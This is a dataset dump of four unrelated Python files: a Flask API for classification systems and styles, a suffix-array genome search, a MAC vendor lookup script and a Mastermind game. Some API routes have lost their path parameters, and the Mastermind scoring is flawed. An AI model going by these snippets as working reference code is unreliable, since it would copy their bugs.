\"\"\"\n system = data.get_identifier_system(system_name, system_version)\n \n return ClassificationSystemSchema().dump(system), 200\n\n\n@current_app.route(\"/style_formats/search/\", methods=[\"GET\"])\ndef style_format_search(style_format_name):\n \"\"\"Return identifier of a style format.\n \n :param style_format_name: name of a style format\n \"\"\"\n style_format = data.get_identifier_style_format(style_format_name)\n \n return StyleFormatsSchema().dump(style_format), 200\n\n\n@current_app.route('/classification_systems', defaults={'system_id': None}, methods=[\"POST\"])\n@current_app.route(\"/classification_systems/\", 
methods=[\"PUT\", \"DELETE\"])\n@oauth2(roles=[\"admin\"])\ndef edit_classification_system(system_id, **kwargs):\n \"\"\"Create or edit a specific classification system.\n\n :param system_id: identifier of a classification system\n \"\"\"\n if request.method == \"POST\":\n args = request.get_json()\n \n errors = ClassificationSystemSchema().validate(args)\n \n if errors:\n return abort(400, str(errors))\n \n classification_system = data.create_classification_system(**args)\n \n return ClassificationSystemSchema().dump(classification_system), 201\n \n if request.method == \"DELETE\":\n data.delete_classification_system(system_id)\n \n return {'message': f'{system_id} deleted'}, 204\n \n if request.method == \"PUT\":\n args = request.get_json()\n \n errors = ClassificationSystemMetadataSchema().validate(args)\n \n if errors:\n return abort(400, str(errors))\n \n classification_system = data.update_classification_system(system_id, args)\n \n return ClassificationSystemSchema().dump(classification_system), 200\n\n\n@current_app.route(\"/classification_systems//classes\", methods=[\"POST\"])\n@oauth2(roles=[\"admin\"])\ndef create_class_system_classes(system_id, **kwargs):\n \"\"\"Create classes for a classification system.\n\n :param system_id: identifier of a classification system\n \"\"\"\n args = request.get_json()\n \n errors = ClassesSchema(many=True).validate(args)\n \n if errors:\n return abort(400, str(errors))\n \n classes = data.insert_classes(system_id, args)\n \n result = ClassesSchema().dump(classes, many=True)\n \n return jsonify(result), 201\n\n\n@current_app.route(\"/classification_systems//classes/\", methods=[\"PUT\", \"DELETE\"])\n@oauth2(roles=[\"admin\"])\ndef edit_class_system_class(system_id, class_id, **kwargs):\n \"\"\"Delete class of a specific classification system.\n \n :param system_id: identifier of a classification system\n :param class_id: identifier of a class\n \"\"\"\n if request.method == \"DELETE\":\n data.delete_class(system_id, class_id)\n \n return {'message': f'{class_id} deleted'}, 204\n \n if request.method == \"PUT\":\n \n args = request.get_json()\n \n errors = ClassMetadataSchema().validate(args)\n \n if errors:\n return abort(400, str(errors))\n \n system_class = data.update_class(system_id, class_id, args)\n \n return ClassesSchema().dump(system_class), 200\n\n\n@current_app.route(\"/mappings//\", methods=[\"POST\", \"PUT\", \"DELETE\"])\n@oauth2(roles=['admin'])\ndef edit_mapping(system_id_source, system_id_target, **kwargs):\n \"\"\"Create or edit mappings in service.\n \n :param system_id_source: identifier of a source classification system\n :param system_id_target: identifier of a target classification system\n \"\"\"\n if request.method == \"POST\":\n args = request.get_json()\n \n errors = ClassesMappingSchema(many=True).validate(args)\n \n if errors:\n return abort(400, str(errors))\n \n mappings = data.insert_mappings(system_id_source, system_id_target, args)\n \n return jsonify(ClassesMappingSchema().dump(mappings, many=True)), 201\n \n if request.method == \"DELETE\":\n data.delete_mappings(system_id_source, system_id_target)\n \n return {'message': 'Mapping delete!'}, 204\n \n if request.method == \"PUT\":\n args = request.get_json()\n \n errors = ClassesMappingMetadataSchema(many=True).validate(args)\n \n if errors:\n return abort(400, str(errors))\n \n mappings = data.update_mappings(system_id_source, system_id_target, args)\n \n return jsonify(ClassesMappingSchema().dump(mappings, many=True)), 
\n\n\n@current_app.route(\"/classification_systems/<system_id>/styles\", defaults={'style_format_id': None}, methods=[\"POST\"])\n@current_app.route(\"/classification_systems/<system_id>/styles/<style_format_id>\", methods=[\"PUT\", \"DELETE\"])\n@oauth2(roles=['admin'])\ndef edit_styles(system_id, style_format_id, **kwargs):\n    \"\"\"Create or edit styles.\n\n    :param system_id: identifier of a specific classification system\n    :param style_format_id: identifier of a specific style format\n    \"\"\"\n    if request.method == \"POST\":\n\n        if 'style_format_id' not in request.form:\n            return abort(400, \"Missing 'style_format_id' parameter.\")\n\n        style_format_id = request.form.get('style_format_id')\n\n        if 'style' not in request.files:\n            return abort(400, \"Missing 'style' file part.\")\n\n        file = request.files['style']\n\n        data.insert_file(style_format_id=style_format_id,\n                         system_id=system_id,\n                         file=file)\n\n        links = list()\n        links += [\n            {\n                \"href\": f\"{BASE_URL}/classification_systems/{system_id}/styles/{style_format_id}\",\n                \"rel\": \"style\",\n                \"type\": \"application/json\",\n                \"title\": \"style\",\n            },\n            {\n                \"href\": f\"{BASE_URL}/classification_systems/{system_id}/style_formats\",\n                \"rel\": \"self\",\n                \"type\": \"application/json\",\n                \"title\": f\"Styles of the classification system {system_id}\",\n            },\n            {\n                \"href\": f\"{BASE_URL}/classification_systems/{system_id}\",\n                \"rel\": \"parent\",\n                \"type\": \"application/json\",\n                \"title\": \"Link to classification system\",\n            },\n            {\n                \"href\": f\"{BASE_URL}/classification_systems\",\n                \"rel\": \"parent\",\n                \"type\": \"application/json\",\n                \"title\": \"Link to classification systems\",\n            },\n            {\n                \"href\": f\"{BASE_URL}/\",\n                \"rel\": \"root\",\n                \"type\": \"application/json\",\n                \"title\": \"API landing page\",\n            },\n        ]\n        return jsonify(links)\n\n    if request.method == \"PUT\":\n        if 'style' not in request.files:\n            return abort(400, \"Missing 'style' file part.\")\n\n        file = request.files['style']\n\n        data.update_file(style_format_id=style_format_id,\n                         system_id=system_id,\n                         file=file)\n\n        links = list()\n        links += [\n            {\n                \"href\": f\"{BASE_URL}/classification_systems/{system_id}/styles/{style_format_id}\",\n                \"rel\": \"style\",\n                \"type\": \"application/json\",\n                \"title\": \"style\",\n            },\n            {\n                \"href\": f\"{BASE_URL}/classification_systems/{system_id}/style_formats\",\n                \"rel\": \"self\",\n                \"type\": \"application/json\",\n                \"title\": f\"Styles of the classification system {system_id}\",\n            },\n            {\n                \"href\": f\"{BASE_URL}/classification_systems/{system_id}\",\n                \"rel\": \"parent\",\n                \"type\": \"application/json\",\n                \"title\": \"Link to classification system\",\n            },\n            {\n                \"href\": f\"{BASE_URL}/classification_systems\",\n                \"rel\": \"parent\",\n                \"type\": \"application/json\",\n                \"title\": \"Link to classification systems\",\n            },\n            {\n                \"href\": f\"{BASE_URL}/\",\n                \"rel\": \"root\",\n                \"type\": \"application/json\",\n                \"title\": \"API landing page\",\n            },\n        ]\n        return jsonify(links)\n\n    if request.method == \"DELETE\":\n        data.delete_file(style_format_id, system_id)\n\n        return {'message': 'deleted!'}, 204
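\n\n# A hypothetical client upload for the POST route above (host, identifiers and\n# file name are assumptions): the handler expects a multipart form with a\n# 'style_format_id' field and a 'style' file part.\n#\n#     import requests\n#     requests.post(\"http://localhost:5000/classification_systems/1/styles\",\n#                   data={\"style_format_id\": 2},\n#                   files={\"style\": open(\"my_style.sld\", \"rb\")})\n#\n# The route is admin-only, so a valid OAuth2 credential is also required.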
\n\n@current_app.route(\"/style_formats\", defaults={'style_format_id': None}, methods=[\"POST\"])\n@current_app.route(\"/style_formats/<style_format_id>\", methods=[\"PUT\", \"DELETE\"])\n@oauth2(roles=['admin'])\ndef edit_style_formats(style_format_id, **kwargs):\n    \"\"\"Create or edit style formats.\n\n    :param style_format_id: identifier of a specific style format\n    \"\"\"\n    if request.method == \"POST\":\n        args = request.get_json()\n\n        errors = StyleFormatsSchema().validate(args)\n\n        if errors:\n            return abort(400, str(errors))\n\n        style_format = data.create_style_format(**args)\n\n        return jsonify(StyleFormatsSchema().dump(style_format)), 201\n\n    if request.method == \"DELETE\":\n        data.delete_style_format(style_format_id)\n\n        return {'message': 'deleted'}, 204\n\n    if request.method == \"PUT\":\n        args = request.get_json()\n\n        errors = StyleFormatsMetadataSchema().validate(args)\n\n        if errors:\n            return abort(400, str(errors))\n\n        style_format = data.update_style_format(style_format_id, **args)\n\n        return jsonify(StyleFormatsSchema().dump(style_format)), 200\n","sub_path":"lccs_ws/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":25014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"260387516","text":"'''\nCreated on 30 sept. 2015\n\n@author: perard\n'''\nimport logging\n\nlogger = logging.getLogger()\n\ndef init(genome, read):\n    n = len(genome)\n    suffixes = range(n)\n    suffixes = sorted(suffixes, key=lambda i: genome[i:])\n    return suffixes\n\ndef find(seed, suffixes, genome, i=None, j=None, occurs=None):\n    # occurs defaults to None rather than a mutable [], so each top-level call\n    # starts with a fresh result list instead of accumulating across calls\n    occurs = [] if occurs is None else occurs\n    i = 0 if i is None else i\n    j = len(suffixes) - 1 if j is None else j\n    while i <= j:  # <= so a range narrowed to a single suffix is still examined\n        m = i + int(round((j - i + 1) / 2))\n        index = suffixes[m]\n        if genome[index:].startswith(seed):\n            occurs.append(index)\n            # matches are contiguous in the suffix array, so search both sides\n            find(seed, suffixes, genome, i, m - 1, occurs)\n            find(seed, suffixes, genome, m + 1, j, occurs)\n            return occurs\n        elif seed < genome[index:]:\n            j = m - 1\n        else:\n            i = m + 1\n    return occurs
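\n\n\nif __name__ == \"__main__\":\n    # Minimal usage sketch (the data is made up for illustration): build the\n    # suffix array once, then collect every occurrence of a seed string.\n    genome = \"banana\"\n    suffixes = init(genome, None)  # the 'read' argument is unused by init\n    print(find(\"an\", suffixes, genome))  # the two occurrences, at indexes 1 and 3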
\"--mac\"):\n mac = a\n elif o in (\"-r\", \"--repete\"):\n repetitive = True\n else:\n print(\"Unhandled Argument\\n\")\n usage()\n \n #Repetitive Mode\n if repetitive:\n try:\n while True:\n info = GetMacInfo(input(\"MAC:\\t\"))[\"org\"]\n print(info)\n except KeyboardInterrupt:\n print(\"\\nDone...\")\n\n #CMD Mode\n elif mac != \"\":\n info = GetMacInfo(mac)[\"org\"]\n print(info)\n","sub_path":"Networking/MAC 802.11/ouilookup.py","file_name":"ouilookup.py","file_ext":"py","file_size_in_byte":2581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"6619805","text":"import random\n\ncolor_list = [\"blue\", \"green\", \"yellow\", \"red\", \"white\", \"black\", \"violet\", \"grey\"]\n\ncode_maker=[]\n\nwhile len(code_maker) < 4:\n new_color = random.choice(color_list)\n code_maker.append(new_color)\n \nprint(code_maker)\n\ndef game_loop():\n print(\"Hi, welcome to Mastermind ! Please write 4 colours and press enter after each one.\")\n\n code_breaker = []\n for i in range(len(code_maker)):\n code_breaker.append(input())\n\n\n good_color_good_place = 0\n good_color_bad_place = 0\n final_score = []\n\n for i in range(len(code_maker)):\n for j in range(len(code_breaker)):\n if code_maker[i] == code_breaker[j] and i == j:\n good_color_good_place += 1\n elif code_maker[i] == code_breaker[j] and i != j:\n good_color_bad_place += 1 \n\n final_score.append(good_color_good_place)\n final_score.append(good_color_bad_place)\n print(final_score)\n\ngame = 0\n\nwhile game <= 12:\n game_loop()\n game = game + 1","sub_path":"Mastermind.py","file_name":"Mastermind.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}